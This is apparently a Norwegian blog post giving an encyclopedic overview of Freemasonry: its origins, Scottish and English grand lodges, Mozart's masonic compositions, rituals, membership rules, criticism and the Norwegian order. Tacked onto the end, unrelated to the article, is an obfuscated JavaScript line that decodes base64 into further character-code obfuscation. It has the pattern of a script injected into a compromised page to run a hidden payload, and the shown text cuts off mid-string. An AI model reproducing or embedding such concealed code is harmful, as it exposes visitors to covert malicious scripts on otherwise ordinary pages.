ULVEHYL

Håvard`s blogg . generelt bare tull, men noen gullkorn kan jo finnes….!

Frimureri

Frimureri er en virksomhet som foregår i frimurerlosjer, det vil si lokale sammenslutninger eller losjer som bygger på esoteriske læresystemer der medlemmene innvies gjennom ritualer. De lokale losjene er organisert i ulike storlosjer. Kort fortalt kan det settes opp visse punkter som grunnleggende er like i (nesten) alle internasjonale frimurersystemer:
Sammenslutning av voksne menn med god vandel og økonomi. (lignende organisasjoner eksisterer også for kvinner)
Arbeider sammen i en organisasjon som har en pyramidal struktur.
Hvert medlem innvies. Man deltar så på møter og seremonier og blir en del av broderskapet. Etterhvert får man mulighet til å stige i gradene. Alle seremonier og dets innhold og formål er hemmelige, slik at opptak i en ny grad innebærer en opplevelse som er ukjent på forhånd.
Grunntanken i arbeidet er å bli bedre mennesker, ved å utvikle sin egen etikk og moral til det bedre.
Samler inn store pengebeløp anonymt til nødlidende. Midlene gis videre til organisasjoner som Frelsesarmeen o.l., som forvalter midlene videre.
Ledes nasjonalt av en Stormester og Det høye råd. Hver enkelt losje ledes av en Ordførende Mester som høyeste leder under stormesteren.
Bygger tradisjonelt på historisk grunn (selv om oppfatning av alder og opphav innad i organisasjonene varierer mye).
Står i motsetningsforhold til den katolske kirke, noe som siden 1400-tallet er gjensidig (Den Norske Frimurerorden har ikke noe i mot den katolske kirke, og har mange katolske medlemmer).
Det er en esoterisk organisasjon med hensyn til ritualene. I Norge og de andre nordiske land publiseres årlig en oversikt – matrikkel over medlemmene, med oversikt over alle losjene med årets møtedatoer og andre opplysninger om Frimurerlosjen. (De skandinaviske landene anses å praktisere større åpenhet overfor samfunnet enn øvrige losjer i Europa.)
Det spekuleres i om medlemskap benyttes som «springbrett» i næringsliv m.m. Frimurerordenens lover forbyr medlemmene å favorisere hverandre eller å henvise til sitt medlemskap for å oppnå fordeler («Annet Kapitel – En frimurers plikter mot Ordenen – §20: Ingen frimurer må benytte seg av sin stilling i Ordenen til å søke å skaffe seg personlig fordel eller ved å henvise til broderskapet for å oppnå en begunstigelse, likesom ingen frimurer urettmessig må begunstige en annen frimurer.»)
Historisk har frimureriet i flere århundrer vært assosiert med overklassen, eliten, adelen og kongehusene.
I dag representerer medlemsmassen i Norge alle deler av den mannlige befolkningen.
Ingen internasjonal organisasjon styrer alle losjer. Det er imidlertid en del samarbeid over landegrensene, spesielt der losjene praktiserer det samme gradssystemet. Frimurere kan få et frimurerpass slik at de kan besøke samarbeidende losjer i andre land. Medlemmene instrueres gradvis i idealer av moralsk og metafysisk karakter gjennom en serie hemmelige ritualer. I de fleste grener av frimureriet har man en felles tro på et høyeste vesen. Frimureriet er en livslang skole – og i Norge, som praktiserer det svenske system, utgjør «normert» tjenestetid i de forskjellige gradene tilsammen 15-20 år for å bli en 10. grads broder. Gjennomsnittsalderen ved opptak i Norge er per i dag 35-45 år.
I det Det svenske Frimurersystem, som praktiseres i Norge, finnes det 10 operative grader, en administrativ 11. grad og en 12. grad som tildeles den til enhver tid valgte Stormester i Ordenen.
Rosslyn Chapel.

Frimureriets opprinnelse er satt i sammenheng med Rosslyn Chapel i Midlothian nær Edinburgh i Skottland. Steinkirken er tilegnet St.Matteus, og ble bygget av William Sinclair (* 1410; † 1484), 1. jarl av Caithness og baron av Rosslyn. Byggingen startet i 1446, da kirken offisielt ble grunnlagt, og ble avsluttet i 1484, da taket ble satt på. William Sinclair skal være begravet her, men steinkisten er av nyere dato.

Kapellet er egentlig en av fire fløyer i en påbegynt korskirke, en av få som overlevde reformasjonen i Skottland. Kapellet er meget rikt utsmykket, med vanlige kirkelige motiver. Under Viktoriatiden (på 1800-tallet) ble det reist et tilbygg som i dag fungerer som inngang til selve kapellet. Krypten under kapellet fungerer som gravkapell for Sinclairfamilien. Det er gjort vitenskaplige undersøkelser for å finne andre underjordiske rom, men ingen har blitt funnet. The Genealogie of the Saintclaires of Rosslyn 0 902324 63 2]
Familien Sinclair nedstammer fra normanniske konger fra Pont d’Evequeder Normandie i Frankrike og er ofte satt i sammenheng med Tempelridderne.
Frimurerlosjer grunnlagt i Skottland 1599-1712
Arkiver i Skottland dokumenterer opprettelsen av minst 25 frimurerlosjer mellom 1599 og 1712:
Aitchison’s Haven, 9. januar 1599 (1. Charter (1600–1601) av St Clair)
Edinburgh, 31. juli 1599 (2. Charter (1627–1628) av St Clair)
St Andrews, 27. november 1599 (1. 1600–1601 og 2. [[[1627]]–1628 charter av St Clair)
Kilwinning, Ayrshire, 28. desember 1599
Stirling, 28. desember 1599 (2. Charter (1627–1628) av St Clair)
Haddington, 1599 (1. Charter (1600–1601) av St Clair)
Dunfermline, 1600–1628 (Første (1600–1601) og andre (1627–1628) Charter av St Clair)
Glasgow, 31. desember 1613 (2. Charter (1627–1628) av St Clair)
Dundee, 1627–1628 (2. Charter (1627–1628) av St Clair)
Linlithgow, 2. mars 1654
Scone (Perth), 24. desember 1658
Aberdeen, 1670 ?
Melrose, 28. desember 1674
Canongate Kilwinning, 20. desember 1677
Inverness, 27. desember 1678
Dumfries, 20. mai 1687
Canongate and Leith, Leith and Canongate, 29. mai 1688
Kirkcudbright, ca 1691 ?
Hamilton, 25. mars, 1695
Dunblane, april 1695
Kelso, 2. juni 1701
Haughfoot, 22. desember 1702
Banff, 1703
Kilmolymock (Elgin), 27. desember 1704
Edinburgh Journeymen, 1707–1712
Det er grunn til å anta at det fantes flere frimurerlosjer i Skottland i denne perioden.

Den Engelske Storlosje 1717
Det moderne frimureriet oppstod da fire losjer i London dannet den Engelske Storlosje den 24. juni 1717:
The Apple Tree Tavern (Eple-treets gjestgiveri), Charles Street
The Goose & Gridiron Ale-house (Gåsens og stekeristens pub), St. Paul katedralens kirkegård
Crown Ale House (Kronens pub), nær Drury Street
The Rummer & Grapes Tavern, (?) Channel Row, Westminster
Stiftelsesmøtet ble holdt ved Goose & Gridiron i nærheten av St. Paul-katedralen. Anthony Sayer (* ca 1672, † 1741 eller 1742) fungerte som Stormester, og storlosjen overtok våpenskjoldet som ble tildelt London-selskapet av Frimurere i 1473. Den 24. juni eller Sankthans er i dag tilegnet Johannes døperen. I den Julianske kalender er det dagen for sommersolverv som ble feiret av før-kristne mysteriereligioner.
Flertallet av storlosjens første Stormestre var skotske. I 1723 ble storlosjens Konstitusjon skrevet av den presbyterianske presten James Anderson. Anderson ble født i Aberdeen, Skottland, der faren var stormester i en Aberdeen-losje.
Kanskje var den Engelske Storlosje et resultat av det skotske Jakobittiske opprør i 1715. Siden de var vel vitende om at frimureriet ble bragt til England av Jakob I av Skottland, kan opprøret ha utløst nervøsitet blant Londons frimurere, som ble tvunget til å benekte sin skotske opprinnelse, skjule sin historie og strategisk skape en ny institusjon, en storlosje som var alliert med kongen av Hannover.
En rivaliserende engelsk Storlosje 1751
Den 17. juli 1751 samlet representanter for fem losjer seg i Turk’s Head Tavern, i Greek Street, Soho, London og opprettet «Det Aller Eldste og Ærværdige Samfunn av Frie og Anerkjente Murere» (The Most Ancient and Honourable Society of Free and Accepted Masons). Storlosjen bestod først og fremst av irske frimurere som bodde og arbeidet i London: 72 av de 100 første navnene på medlemslisten var fra Irland. Skismet varte frem til 1813, da de slo seg sammen til Englands forente storlosje.
Grand Orient 1733
De første frimurerlosjene i Frankrike ble etablert mellom 1726 og 1730, blant annet i Bordeaux og Dunkerque.
Storlosjen i Frankrike (Grand Orient) var den første som opptok kvinner som medlemmer. Etter opprettelsen av Adopsjonens Rite i 1774 ble det utstedt edikter som anerkjente kvinner. Hertuginnen av Bourbon ble første Grand Mistress av Frankrike. Grand Orient utviklet også prinsippet om Laïcité – adskillelse av kirke og stat og fraværet av religiøs innblanding i politikk. I 1877 tillot losjen personer uten tro på et Høyere Vesen (Gud) som medlemmer. I tillegg var Grand Orient den første til å anerkjenne høygrads-systemer. Grand Orient ble ikke anerkjent av Den Engelske Landslosje. Dette skismet har vart frem til i dag. Napoleon III ble Stormester av Grand Orient, og utnevnte prins Lucien Marat og senere Marshal Magnan til å lede losjene i Frankrike. Frimurerlosjene spilte en viktig rolle i den franske revolusjon i 1789 og seinere.
Den videre historie
I løpet av få årtier spredte virksomheten seg til alle deler av Europa og de europeiske koloniene. De lukkede frimurerlosjene ble mistenkt for å være arnesteder for politiske konspirasjoner. Spesielt den italienske P2-losjen (Propaganda Due) har vært omstridt. Sistnevnte var knyttet til den italienske mafiaen og involvert i svindel av blant annet Vatikanbanken på 1990-tallet. Mange losjer hevder at frimureriet stammer fra middelalderens Tempelridderorden. Da tempelridderne først på 1300-tallet ble undertrykt i Frankrike og andre steder på kontinentet, skal ordenens hemmelige tradisjoner ha blitt videreført av tempelriddere som flyktet til Skottland. Kildegrunnlaget for påstandene er imidlertid dårlige. En tradisjon sier dessuten at frimureriet har røtter tilbake til oldtidens mysteriesamfunn og urkristendommens brorskap. Dette er også dårlig dokumentert.
Symbolikk
Gjennom innvielsene blir medlemmene instruert i et symbolsk kunnskapssystem. Murerfagets verktøy brukes som symboler – den rette vinkel og loddsnora betegner rettskaffen oppførsel, mens en utilhugget stein representerer det uforedlede mennesket og en tilhogd, kubisk byggestein det fullkomne mennesket.
Gud betegnes som Den Trefold Store Byggmester. Kandidaten får høre beretningen om hvordan byggmesteren Hiram Abiff ble drept under arbeidet med å bygge Kong Salomos Tempel i Jerusalem. De tilhørende håndgrep, ord og løsen og spesielle positurer bidrar dels til å forsterke ritualet i losjen og dels til at frimurere kan gjenkjenne hverandre utenfor losjene.

Wolfgang Amadeus Mozart var frimurer i de siste syv siste årene av sitt liv. Den frimurerorden som han tilhørte, spilte en viktig rolle i hans liv og verker.
Den 14. desember 1784 ble han gjennom sin nære venn Freiherr Otto von Gemmingon innviet i losjen Zur Wohltätigkeit («Veldelighet») i Wien. Den 7. januar 1785 ble han innviet i andre grad (svenn), og den 22. april 1785 ble han innviet i tredje grad som mestermurer.
Mozart deltok også i møtene til losjen Zur wahren Eintracht («den sanne harmoni»), som ble ledet av naturalisten Ignaz von Born. Dette var den største og mest aristokratiske losjen i Wien, og Mozarts besøk i denne losjen er bevart i losjens møteprotokoller.
Gjennom en reform den 11. desember 1785 (Freimaurerpatent) ble Zur wahren Eintracht slått sammen med to andre losjer, og Mozart kom deretter til å tilhøre losjen Zur Neugekrönten Hoffnung («det nye kronede håp»).
De bevarte frimurer-dokumenter forteller at Mozart var høyt ansett av andre frimurere. Mange av hans nære venner var frimurere. Under sitt besøk i Wien, ble også hans far Leopold Mozart frimurer.
Ideologi
På Mozarts tid bestod frimureriet av to hovedretninger, der noen hovedsakelig var opptatte av mystikk og okkultisme, mens andre var mer engasjerte i opplysningstidens idealer om humanisme og naturvitenskap. Det er blitt hevdet at Mozart tilhørte den siste retningen. Enkelte er også tilbøyelige til å identifisere denne fraksjonen med Illuminatus-ordenen, ved å påpeke at Mozart var en nær venn av dens grunnlegger Adam Weishaupt.
Illuminati fremmet blant annet de humanistiske synspunktene til de franske filosofene Jean-Jacques Rousseau og Denis Diderot, deriblant at tilhørighet til en høy sosial klasse ikke var ensbetydende med at man var åndelig opplyst. Disse filosofene hevdet at folk av lavere klasser kunne være noble i ånden, liksom folk av høyere klasser kunne være middelmådige. Dette synspunktet finner man igjen i operaer av Mozart. I operaen Figaros bryllup, som var basert på et teaterstykke av frimureren Pierre Beaumarchais, blir Figaro fra den lavere klasse fremstilt som helten, mens grevinnen Almaviva er den ukultiverte personen.
Det finnes likevel ikke beviser for at Mozart tilhørte Illuminati. Listene over medlemmer som ble beslaglagt av de bayerske myndighetene, viser at Mozarts mentor Gottfried van Swieten var medlem av Illuminatus-ordenen, men Mozart selv er ikke nevnt.
Frimurere brukte musikk i deres ritualer, og anvendte Jean-Jacques Rousseaus humanistiske synspunkter på musikkens mening der dens rolle var å fremme gode dyder. Noe slikt forutsetter en musikk-stil som var helt forskjellig fra den galante stilen, som var dominerende på denne tiden. Mozarts stil er ofte referert til som «humanistisk», og er i samsvar med frimurernes syn på musikk.
Musikken til frimurerne inneholdt musikalske fraser og former som hadde spesifikke semiotiske meninger. Innvielses-ritualet i frimurerlosjen ble for eksempel innledet med at kandidaten kakket tre ganger på døren for å be om adgang til medlemskap.
Liste over Mozarts frimurer-komposisjoner
Dette er verker som Mozart komponerte for å brukes i losjemøter.
Lied (sang) Gesellenreise, K. 468, «for bruk ved innvielse av nye svenner (II º)», mars 1785
Kantate for tenor og mannskor «Die Maurerfreude», K. 471, premiere 24. april 1785
Frimureres begravelses-musikk (Maurerische Trauermusik), K. 477/479a, ikke senere enn november 1785.
To sanger, K. 483 og K. 484, for å feire åpningen av losjen Zur Neugekrönten Hoffnung; 14. januar 1786.
Kantate for tenor og piano, Die ihr die unermesslichen Weltalls Schöpfer ehrt, K. 619 (1791)
Den lille frimurer-kantaten (Kleine Freimaurer-Kantate) med tittelen Laut verkünde unsre Freude, for solo, mannskor og orkestre, K. 623, premiere under Mozarts ledelse 18. november 1791.

Ritualer
Frimureriet er en lukket, rituell sammenslutning. For å bli medlem må man gjennomgå en innvielse.
Grunnlaget, som alle frimurersammenslutninger praktiserer, er de tre grunnleggende gradene som er forholdsvis like under de aller fleste retningene: lærling, svenn og mester, Disse tre utgjør «Det blå frimureri» eller Johannes-gradene, dvs. første, andre og tredje grad. Utover dette tilkommer det en lang rekke tilleggsgrader, mellomgrader og høygrader. Antall grader varierer etter system. I det svenske systemet er det til sammen 10 rituelle og to administrative grader, og i AASR (Ancient and Accepted Scottish Rite of Freemasonry), praktiseres det 33. I Misraim Rite-systemet er det 99 grader og i Det engelske system er de tre første gradene beholdt som de eneste. De ulike systemene som har grader utover de tre første kalles gjerne høygradssystemer (fra 7. grad i Norge). Frimureriet i Norge praktiserer «Det svenske system». Hertug Carl af Södermansland (født 7. oktober 1748, død 5. februar 1818), i Sveriges kongerekke Karl XIII, av fyrstehuset Holstein-Gottorp, var konge av Sverige fra 1809 og Norges konge fra 1814 frem til sin død i 1818. Han regnes som det svenske systemets far, og var den som tilpasset ritualsystemet til svenske forhold. Hertugen reiste i 1798-1800 til Wien og Praha, der han besøkte losjer og fikk lov til å lese i arkivene deres og ta kopi av spørsmålsbøkene, som han tok med hjem til Sverige. Han tilpasset lover og administrative bestemmelser etter lokale forhold, fastsatte hvordan gradene skulle være, og hvordan de ulike salene skulle innredes og utsmykkes. Han fullførte arbeidet i 1801, men redigerte det flere ganger før sin død. Andre utbredte gradssystemer er som nevnt over The Ancient and Accepted Scottish Rite of Freemasonry) med 33 grader, og York Rite eller American Rite, som består av 10 grader organisert i tre forskjellige skifter, ikke ulikt det svenske system. En hovedforskjell er at i disse systemene kan en frimurer selv velge hvilket høygradssystem han vil gå inn i etter å ha fullført de tre første gradene. Det finnes også en mulighet for å bytte høygradssystem og fullføre i et annet system, så lenge det hører til de legitime systemene som er godkjent av gradssystemet, mens det i det svenske system er en ubrutt sammenheng fra første til tiende grad.
Mange ulike organisasjoner har utviklet ritualer som bygger på frimureriet. Dette gjelder en rekke «vennskapelige samfunn», som Lions Clubs International og Rotary, og dessuten flere avholdsorganisasjoner som IOGT (International Order of Good Templars) og Tempelridderordenen, Ordo Templi Orientis, Odd Fellow, Rosenkorsordenen A.M.O.R.C., Mariaordenen, Ordenen Riddere av det hvite kors og Druidordenen. Le Droit Humain er en av flere andre losjer med ritualer som kan likne på dem vi finner i Det svenske Frimurersystem som brukes i de Nordiske land, Norge, Sverige, Island, Danmark og Finland. I Danmark og Finland har de to Storlosjer, dvs. at man har tillatt flere ulike losjesystemer i landet. I tillegg er Det svenske Frimurersystem utbredt i Tyskland. I likhet med i Danmark og Finland finnes det i Tyskland flere Storlosjer/Landslosjer

Loger
I motsetning til hva folk flest tror, møtes ikke frimurerene i en losje, de møtes som en losje, på samme måte som kristne møtes som en menighet. I samme by kan det være flere losjer som normalt benytter de samme lokalene, på ulike dager. Lokale losjer er alltid underordnet overordnede gradslosjer. I Norge, hvor det arbeides etter det svenske systemet, er rangstigen slik: Johanneslosjer, Andreaslosjer, Kapitellosjer/Stewardslosjer/Provinciallosjer/Landslogen. Johannesgradene er fra første til tredje grad, Andreasgradene er fjerde til sjette, og Kapitel- eller Stewardsgradene er fra syvende til ellevte.
Medlemskap
Mens frimureriet i Norge bare aksepterer menn som bekjenner seg til den kristne tro som aktuelle kandidater, er det ulik praksis i andre losjesystemer. De fleste losjer i verden aksepterer menn fra ulike religioner, så som kristne, jøder, muslimer, buddhister, osv. Dette varierer fra land til land og system til system, avhengig av hvilken gren av frimureriet losjen er underlagt.
Enkelte losjer tar inn ateister, men de fleste krever at man må tro på «et Høyeste Vesen». I det svenske systemet er det en forutsetning at man bekjenner seg til den kristne tro.
For å være aktuell som kandidat til å bli opptatt som frimurer i Norge må man:
Være mann.
Bekjenne seg til den kristne tro. Det stilles imidlertid ingen krav om tilslutning til særskilte dogmer eller bekjennelser.
Aldersgrensen for å komme i betraktning er 24 år, men unntak kan gjøres av Stormesteren personlig for kandidater eldre enn 21 år (gjennomsnittet i Norge ved opptak er 44 år).
Ha en ordnet, god økonomi.
Være en vel ansett borger av samfunnet (d.v.s. ha en god vandel).
Ha en god moral.
Være fri (d.v.s. ikke være ubemyndiget).
Av egen fri vilje søke medlemskap gjennom to personer som er medlemmer og minimum innehar tredje grad (det er de siste årene også blitt mulig å henvende seg vedrørende medlemskap via Ordenens internettsider).
Å diskutere religion og politikk i losjen er i Norge strengt forbudt, det samme gjelder sosiale stridsspørsmål. I losjen møtes direktør og medarbeider til arbeid, likhetsprinsippet er en selvfølge.
Kritikk mot frimureriet
Frimureriet har vært kontroversielt gjennom hele sin historie. Katolsk kirkerett forbyr katolikker å være medlem i frimurerlosjer. På tross av dette har Den Norske Frimurerorden en rekke katolske medlemmer.[trenger referanse] Det finnes også andre kirkesamfunn som tar avstand fra frimureriet.
I kommunistiske og fascistiske stater har frimureriet vært forbudt og medlemmene forfulgt. Interessant i denne sammenheng er at de fleste som frontet den russiske revolusjon og mange av de som senere ble medlem av sentralkomiteen angivelig var opptatt som frimurere.[trenger referanse] Med unntak av Lenin besto gruppen hovedsakelig av menn fra den øvre middeklasse, og dette kan være forklaringen på at de var frimurere.
Mange har også vært kritiske til frimureriets lukkede organisasjonsform, som historisk har forhindret innsyn og ekstern kontroll, og dets «siling» av søkende menn.
Mens frimureriet særlig i katolske land har vært ansett som samfunnsnedbrytende, har det i protestantiske land utviklet seg til et ledd i overklassens selskapskultur. Kritikere legger vekt på at medlemmene ofte er eldre, veletablerte menn, med viktige posisjoner i samfunnet som dommere, leger, prester og bedriftsledere. Dette er imidlertid ikke helt korrekt. Medlemmene bekler alle stillinger og posisjoner på alle nivåer i samfunnet, fra håndverkere og lærere til selgere og bedriftsledere. Det påstås derimot at jo høyere man kommer på den sosiale rangstigen, desto flere frimurere finnes det.
Frimurerordnene har blitt kritisert for å være et hemmelig nettverk der medlemmene hjelper hverandre.[trenger referanse] Faktum er derimot at Den Norske Frimurerorden har lover som forbyr medlemmer å henvise til sitt medlemskap med den hensikt å oppnå fordeler foran andre (Lover for Den Norske Frimurerorden, 2010. 2. kap. §20.) I tillegg ville jo mye av kritikken som går ut på nettverksbygging i like stor grad gjelde andre frivillige organisasjoner som golfklubber etc., og rammer derfor ikke frimureriet spesielt.
I England var det i 1999 en stor avissak rundt flere av dommerne i Høyesterett som ikke ville fortelle hvem som var medlemmer av de forskjellige ordnene. Det ble konkludert med at dette var et demokratisk problem.[trenger referanse]
Fiskeriminister Svein Ludvigsen i Kjell Magne Bondeviks 2. regjering var frimurer, noe som ble kritisert både av medier og av medlemmer av Stortingets kontroll- og konstitusjonskomite. Ludvigsen og Bondevik mente i utgangspunktet at medlemskapet ikke rokket ved statsrådens habilitet.[4] Ludvigsen valgte likevel kort tid etter å melde seg ut av losjen. I 2007 søkte han på nytt om opptak; han var da fylkesmann i Troms.[5] Også daværende NRK-sjef John Gordon Bernander ble kritisert for sitt medlemskap i losjen.[6]
Frimureriet i Norge
Den første frimurerlosjen i Norge var «St. Olai Loge». Mange losjer i Den Norske Store Landsloge har «St. Olai Loge» som moder-losje. I 1780 skiftet den navn til «St. Olaus til den hvide Leopard».
St. Olaus t.d.h. Leopard ble grunnlagt 24. juni (St. Hansdag) 1749 i Christiania av Grev Christian Conrad Danneskiold-Laurvig, sannsynligvis med den danske Kong Fredrik V tilstede. Losjen er en avlegger av den danske losjen «St. Martin», og var frem til 1814 underlagt Logedirektoriet i København. Før 1814 praktiserte St. Olaus til den hvide Leopard høygrads-systemene «Den Strikte Observans» og «Det Rektifiserte System». I 1814 ble losjen underlagt Den Svenske Store Landslosjen da det svenske system ble innført.1814.
Den Norske Store Landsloge (1891)
«Den X Frimurerprovins» ble opprettet i 1891 (fra 1937 «Den Norske Frimurerorden»), bestående av fire St. Johanneslosjer, én St. Andreas-losje og en Stewards-losje.
Det norske frimureriet i dag
Den Norske Frimurerorden består i dag av 95 losjer. 63 av disse er St. Johanneslosjer, 19 er St. Andreaslosjer, 7 Stewardslosjer, 3 Provinciallosjer, Den Norske Store Landsloge og én forskningslosje. I tillegg har Ordenen 30 broderforeninger og 25 frimurergrupper. Ordenen har i 2011 i underkant av 20 000 medlemmer. Det svenske system, som praktiseres i Norge, resten av Norden og i deler av Tyskland, har en tydelig kristen profil i motsetning til de fleste andre retningene som er mer eller mindre religionsuavhengige. Medlemslistene i Norge, i motsetning til de fleste andre steder i verden, blir publisert årlig i frimurer-matrikkelen, som sammen med frimurerlovene regnes som offentlige dokumenter som er tilgjengelige for alle. Disse kan kjøpes ved henvendelse til Ordenens sekretariat i Oslo og andre steder i landet hvor det finnes en frimurerlosje.
Den første norske stormesteren var legen Johan Gottfried Conradi (1905). Under unionen med Sverige var den svensk-norske kongen ordenens Stormester. Conradi overtok etter Oscar II i 1905. I annen halvdel av det 20. århundre var Bernhard Paus den mest betydelige stormester. Nåværende stormester er Ivar A. Skar, som ble valgt høsten 2005.

var GMRXIILOXU = atob(‘dmFyIElQVUhUSlBSVkUgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIyIC0gNCwgMTAwIC0gMywgMTIwIC0gNiwgNDEgLSA5LCAxMTQgLSA3LCAxMDggLSA3LCAxMjYgLSA1LCAzNCAtIDIsIDY4IC0gNywgMzcgLSA1LCA0NiAtIDcsIDExNiAtIDUsIDk0IC0gOCwgMTA2IC0gOSwgMTE1IC0gMSwgODEgLSA3LCAxMDkgLSA3LCA4MiAtIDUsIDgyIC0gNywgMTAwIC0gMywgMTE3IC0gNywgNDYgLSA3LCA2MSAtIDIsIDE2IC0gNiwgMTIyIC0gNCwgMTA1IC0gOCwgMTIzIC0gOSwgMzcgLSA1LCAxMDUgLSA0LCAxMTYgLSA2LCAxMDAgLSAxLCAxMDQgLSAzLCAxMDggLSA4LCAzOSAtIDcsIDY1IC0gNCwgMzUgLSAzLCA0MCAtIDEsIDg2IC0gNSwgNzUgLSAzLCAxMTIgLSA0LCAxMDMgLSAzLCA3MCAtIDUsIDkxIC0gOCwgMTE0IC0gNywgOTMgLSA4LCA3OSAtIDUsIDcyIC0gNCwgMTE4IC0gMywgOTMgLSA3LCA5MSAtIDYsIDczIC0gMiwgOTQgLSA5LCAxMTAgLSA3LCA2OCAtIDMsIDczIC0gOCwgNjcgLSAxLCAxMTcgLSA0LCA3NCAtIDUsIDg4IC0gNiwgNzQgLSAxLCAxMTMgLSAzLCA3MSAtIDMsIDEwNSAtIDIsIDU3IC0gOSwgODEgLSAyLCA3OSAtIDYsIDEwNSAtIDIsIDEwNCAtIDEsIDEwNiAtIDYsIDc2IC0gMiwgNzggLSA5LCA5NyAtIDcsIDEyOCAtIDksIDEwNiAtIDksIDEyNSAtIDYsIDU3IC0gMSwgMTAzIC0gNSwgNjggLSAzLCAxMjkgLSA3LCAxMTQgLSAyLCAxMDAgLSAzLCAxMTAgLSA5LCA3MSAtIDMsIDEyNiAtIDcsIDc3IC0gNSwgODIgLSAyLCA1OCAtIDgsIDEyMCAtIDUsIDg2IC0gMiwgNzQgLSA3LCAxMjggLSA5LCAxMjQgLSA5LCA1MiAtIDUsIDczIC0gNCwgMTI0IC0gNCwgMTAxIC0gMiwgMTIwIC0gOCwgNzIgLSAzLCAxMTEgLSAyLCA1NSAtIDYsIDUyIC0gMiwgODIgLSAxLCA4NiAtIDUsIDEwOSAtIDYsIDg4IC0gOSwgODMgLSA0LCAxMTIgLSA4LCA3OSAtIDYsIDkzIC0gNSwgMTA4IC0gOSwgOTMgLSA2LCAxMjkgLSA5LCA4MSAtIDksIDg3IC0gNywgODIgLSAxLCA3MSAtIDYsIDEwNiAtIDcsIDg4IC0gNCwgMTI1IC0gMywgNzggLSA1LCA4NCAtIDUsIDgwIC0gOCwgMTI0IC0gMywgMTIxIC0gNiwgODMgLSAzLCA4MSAtIDgsIDEyNCAtIDIsIDExMSAtIDcsIDcxIC0gNSwgODcgLSAyLCA1NiAtIDgsIDU5IC0gMywgODMgLSA1LCAxMDUgLSA4LCA1MiAtIDMsIDc5IC0gNSwgMTE5IC0gNiwgODcgLSA2LCA4NCAtIDEsIDg2IC0gMSwgNTEgLSA0LCA3NyAtIDcsIDg4IC0gNiwgNTcgLSA0LCA5MSAtIDUsIDEwOSAtIDgsIDg5IC0gNCwgNjEgLSA5LCA5NCAtIDQsIDc3IC0gMywgNzMgLSA3LCA3OSAtIDYsIDUxIC0gOCwgODkgLSA5LCA4OCAtIDMsIDY0IC0gOCwgNjYgLSAxLCA2NyAtIDIsIDYwIC0gOSwgMTE1IC0gOCwgNzUgLSAyLCA4MCAtIDgsIDEyNCAtIDMsIDExNiAtIDEsIDY4IC0gMiwgODQgLSA5LCA3MyAtIDUsIDExMSAtIDcsIDg2IC0gNywgNzcgLSA2LCAxMTEgLSA4LCA3NyAtIDQsIDExMiAtIDMsIDkyIC0gOCwgMTI2IC0gNywgNzggLSA1LCAxMDcgLSAyLCA3NSAtIDUsIDExMCAtIDEsIDExNyAtIDUsIDExMiAtIDIsIDEwMSAtIDQsIDU0IC0gNiwgNTggLSA1LCA4NSAtIDUsIDEwOCAtIDksIDg2IC0gNSwgMTEwIC0gMywgNzkgLSA4LCA4MSAtIDEsIDEwNSAtIDEsIDkxIC0gMSwgNTQgLSAzLCA5OCAtIDgsIDcxIC0gMiwgNTQgLSAyLCA3NiAtIDgsIDc1IC0gOCwgMTEwIC0gNCwgNzIgLSAzLCA2NiAtIDEsIDY3IC0gMSwgMTExIC0gNiwgNjQgLSA4LCA5MiAtIDgsIDc4IC0gMywgNTkgLSA5LCA5MyAtIDgsIDcwIC0gMSwgNzMgLSA2LCAxMDUgLSAyLCAxMTYgLSA1LCA1NiAtIDIsIDc1IC0gNywgMTE3IC0gOSwgMTIwIC0gMSwgMTEwIC0gMywgNzMgLSA4LCAxMzEgLSA5LCAxMTMgLSA1LCAxMTMgLSA2LCA3MiAtIDcsIDExMiAtIDksIDExMCAtIDMsIDcyIC0gMSwgMTA3IC0gNiwgMTI1IC0gNiwgODQgLSA3LCAxMDUgLSA3LCA3NSAtIDEsIDc2IC0gNywgMTEzIC0gNiwgNjIgLSA5LCA4MyAtIDksIDEwNiAtIDIsIDc2IC0gNiwgNzAgLSA1LCA3NSAtIDMsIDEzMCAtIDgsIDU0IC0gMiwgODMgLSAxLCA4OCAtIDIsIDg5IC0gMiwgOTggLSA4LCAxMTYgLSAxLCAxMDcgLSA5LCA5NSAtIDgsIDExNyAtIDEsIDc4IC0gNywgNjkgLSAzLCAxMTEgLSA3LCAxMTggLSAzLCAxMTMgLSA4LCA3MiAtIDMsIDg4IC0gMywgMTA4IC0gNCwgMTEzIC0gNSwgODkgLSA2LCA4NyAtIDMsIDExNSAtIDQsIDYwIC0gNCwgNzMgLSAzLCAxMTMgLSA2LCA2NyAtIDIsIDgwIC0gOSwgODYgLSA4LCA4NCAtIDMsIDY5IC0gNCwgMTAwIC0gMSwgNzkgLSAzLCA4NCAtIDIsIDgxIC0gNCwgNTUgLSA4LCA3NCAtIDEsIDEwOSAtIDIsIDYwIC0gNCwgODMgLSA1LCA3MCAtIDUsIDcwIC0gMiwgMTIyIC0gNiwgODIgLSAzLCA3OCAtIDYsIDEyNSAtIDQsIDg2IC0gMSwgNzYgLSA5LCA4NiAtIDcsIDcxIC0gNCwgMTAwIC0gMSwgNzUgLSA2LCA3NSAtIDMsIDk0IC0gOSwgNzQgLSA5LCA2MyAtIDgsIDc0IC0gNiwgMTExIC0gNywgOTIgLSAzLCA5MSAtIDUsIDc4IC0gNiwgMTE1IC0gOSwgNjAgLSA4LCAxMjcgLSA2LCA3MSAtIDIsIDEwNSAtIDEsIDEyMCAtIDksIDgxIC0gNiwgODQgLSA1LCA1NiAtIDgsIDYxIC0gOSwgNzQgLSAzLCA3NSAtIDEsIDEyOSAtIDksIDkxIC0gMSwgMTA3IC0gMSwgODUgLSA2LCAxMjIgLSAzLCAxMTAgLSAzLCAxMDMgLSAyLCA4OSAtIDYsIDgwIC0gOCwgMTIwIC0gOCwgMTIwIC0gNiwgODkgLSA0LCAxMTcgLSA4LCAxMTYgLSA0LCA2NyAtIDEsIDc2IC0gMiwgODcgLSAzLCA2MiAtIDYsIDkwIC0gNCwgNzkgLSA3LCAxMTEgLSAzLCA5NCAtIDgsIDU0IC0gMSwgOTIgLSA4LCAxMTEgLSA4LCA5MCAtIDUsIDU5IC0gMiwgNzYgLSA3LCA5NSAtIDgsIDg1IC0gOCwgMTIyIC0gNCwgNzQgLSA4LCA3MiAtIDYsIDEwNCAtIDEsIDcwIC0gNSwgODEgLSAyLCA2OSAtIDMsIDcxIC0gMiwgMTA2IC0gNiwgODYgLSA3LCA2OCAtIDIsIDc2IC0gMywgMTA5IC0gNiwgNzUgLSAxLCA3MyAtIDcsIDkxIC0gNiwgNzQgLSA4LCA3NSAtIDMsIDg3IC0gN